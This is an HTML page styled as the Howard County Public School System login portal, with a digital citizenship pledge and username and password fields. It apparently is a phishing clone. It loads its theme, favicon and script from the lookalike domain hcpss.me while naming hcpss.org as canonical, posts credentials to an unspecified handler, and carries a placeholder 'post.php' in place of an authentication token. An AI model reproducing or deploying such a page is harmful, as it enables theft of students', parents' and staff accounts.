<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<title> HCPSS</title>
<link rel="canonical" href="https://www.hcpss.org/">
<link rel="shortlink" href="https://www.hcpss.org/">
<link rel="stylesheet" type="text/css" href="/saml/resources/normalize.css">
<link rel="stylesheet" type="text/css" href="/saml/resources/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.Cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
<link rel="stylesheet" type="text/css" href="https://code.cdn.mozilla.net/fonts/fira.css">
<link rel="stylesheet" type="text/css" href="/saml/resources/hcpss-2015-03-26a.css">
<style>
.main p {
  margin: 0 0 10px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #555;
}
.main li{
  margin-bottom: 0;
}
.main{
  color: #555;
}
.thirds{
  width: 21em;
  font-size: 14px;
  float: left;
  margin-bottom: 50px;
}
.connect-links{
  float: left;
}
#A_1 {
    box-sizing: border-box;
    color: rgb(51, 51, 51);
    cursor: pointer;
    display: block;
    height: 100px;
    text-align: left;
    text-decoration: none;
    touch-action: manipulation;
    vertical-align: middle;
    white-space: nowrap;
    width: 609.984px;
    perspective-origin: 304.984px 50px;
    transform-origin: 304.984px 50px;
    background: rgb(255, 255, 255) none repeat scroll 0% 0% / auto padding-box border-box;
    border: 1px solid rgb(204, 204, 204);
    border-radius: 4px 4px 4px 4px;
    font: normal normal normal normal 24px / 34.2857px 'Fira Sans', sans-serif;
    outline: rgb(51, 51, 51) none 0px;
    padding: 6px 12px 6px 30.4844px;
}/*#A_1*/

#IMG_2 {
    box-sizing: border-box;
    color: rgb(51, 51, 51);
    cursor: pointer;
    display: block;
    float: left;
    height: 68.7969px;
    text-align: left;
    vertical-align: middle;
    white-space: nowrap;
    width: 69.2656px;
    perspective-origin: 34.625px 34.3906px;
    transform-origin: 34.625px 34.3906px;
    border: 0px none rgb(51, 51, 51);
    font: normal normal normal normal 24px / 34.2857px 'Fira Sans', sans-serif;
    outline: rgb(51, 51, 51) none 0px;
    padding: 5.64062px 28.2656px 0px 0px;
}/*#IMG_2*/

#DIV_3 {
    box-sizing: border-box;
    color: rgb(51, 51, 51);
    cursor: pointer;
    height: 50.9531px;
    text-align: left;
    white-space: nowrap;
    width: 565.5px;
    perspective-origin: 282.75px 25.4688px;
    transform-origin: 282.75px 25.4688px;
    border: 0px none rgb(51, 51, 51);
    font: normal normal normal normal 24px / 34.2857px 'Fira Sans', sans-serif;
    outline: rgb(51, 51, 51) none 0px;
    padding: 16.9531px 0px 0px;
}/*#DIV_3*/

#DIV_4 {
    box-sizing: border-box;
    color: rgb(51, 51, 51);
    cursor: pointer;
    height: 18px;
    text-align: left;
    white-space: nowrap;
    width: 565.5px;
    perspective-origin: 282.75px 9px;
    transform-origin: 282.75px 9px;
    border: 0px none rgb(51, 51, 51);
    font: normal normal normal normal 13px / 18.5714px 'Fira Sans', sans-serif;
    outline: rgb(51, 51, 51) none 0px;
    padding: 0px 0px 0px 56.5469px;
}/*#DIV_4*/
</style>

<script type="text/javascript" src="/saml/resources/script.js"></script>
<title>Enter your username and password</title>

	<!--link rel="stylesheet" type="text/css" href="/resources/hcpss/default.css" /-->
	<link rel="stylesheet" type="text/css" href="https://hcpss.me/saml/module.php/hcpss-theme/default.css" />
	<link rel="icon" type="image/icon" href="https://hcpss.me/saml/module.php/hcpss-theme/favicon.ico" />



	<meta name="robots" content="noindex, nofollow" />


</head>
<body>
<div class="header group">
<div class="header-inner group" itemscope itemtype="https://schema.org/Organization">
<div class="logomark">
<a href="http://www.hcpss.org/">
	<img itemprop="logo" class="logo shadow-smaller" src="/saml/resources/hcpss-logo-outlined.png" height="60" width="60" alt="">
</a>
<h1><a href="http://www.hcpss.org/">Howard County Public School System</a></h1>
</div>

</div>

</div>

<div class="container group">
<div class="main">
<!-- <div class="alert alert-warning" role="alert">
  <p> The HCPSS Information Technology Department has scheduled a maintenance
    window for HCPSS Connect systems from July 13-24. During this time,
    parents/guardians may not be able to access HCPSS Connect, including
    Synergy, Canvas and Family File, and will not be able to enter any
    updates in the system. Students will be able to access Canvas.</p>
</div> -->
<div id="content">


	<h2 style="break: both"></h2>

	<p class="logintext"></p>

      <div class="thirds thirds-highlight">
      <h2 style="width: 90%; font-size: 1.4em;">Digital Citizenship Pledge</h2>
      <p>When using digital tools I pledge to do the following:</p>
      <ul>
      <li><strong>Respect myself and others</strong></li>
      <p>civility • integrity • vigilance</p>
      <li><strong>Use the digital tools provided to educate myself and others</strong></li>
      <p>collaborate • communicate<br>create • think critically</p>
      <li><strong>Protect myself and others</strong></li>
      <p>passwords • privacy • copyright</p>
      <li><strong>Follow all guidelines outlined in <a href="http://www.hcpss.org/f/board/policies/8080.pdf">Policy 8080: Responsible Use of Technology and Social Media</a></strong></li>
      </ul>
      </div>
	<div class="login-form">

	<form action="?" method="post" name="f" id="f">
	<table>
		<tr>
			<td rowspan="3"><img src="/saml/resources/icons/experience/gtk-dialog-authentication.48x48.png" id="loginicon" alt="" /></td>
			<td style="padding: .3em;">Username</td>
			<td>
<input type="text" id="username" tabindex="1" name="username" value="" />			</td>
			<td style="padding: .4em;" rowspan="2">
				<input type="submit" id="regularsubmit" tabindex="3" value="Login" />			</td>
		</tr>
		<tr>
			<td id="passwordlabel" style="padding: .3em;">Password</td>
			<td><input id="password" type="password" tabindex="2" name="password" autocomplete="off" /></td>
		</tr>

	<tr><td></td><td>
	<input type="submit" id="mobilesubmit" tabindex="3" value="Login" />
	</td>
	</tr>
	</table>
        </div>
<input type="hidden" name="AuthState" value="post.php" />
	</form>

	<div class="connect-links" style="padding-left:8em; padding-top:2em;">
		<i class="fa fa-key" aria-hidden="true"></i>
		<strong><a href="https://account.hcpss.org/self-service" tabindex="4" target="_blank">Forgot Password</a></strong><br>
		<i class="fa fa-id-card-o" aria-hidden="true"></i>
		<strong><a href="https://sis.hcpss.org/PXP2_Password_Help.aspx" tabindex="5" target="_blank">Parents/Guardian Account Activation</a></strong>
	</div>

  </div><!-- #content -->
</div>
</div>

<div class="footer group">
<div class="footer-inner group">
<div class="container">
<span style="color:#DDD;">Use of this web site indicates acceptance of the Howard County Public School System's<br>
<a style="color:#FFF;" href="http://www.hcpss.org/f/board/policies/8080.pdf">Responsible Use of Technology and Social Media Policy.</a>
</span>
</div>
</div>
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script src="https://hcpss.me/saml/module.php/hcpss-theme/script.js?v2.6"></script>
</body>
</html>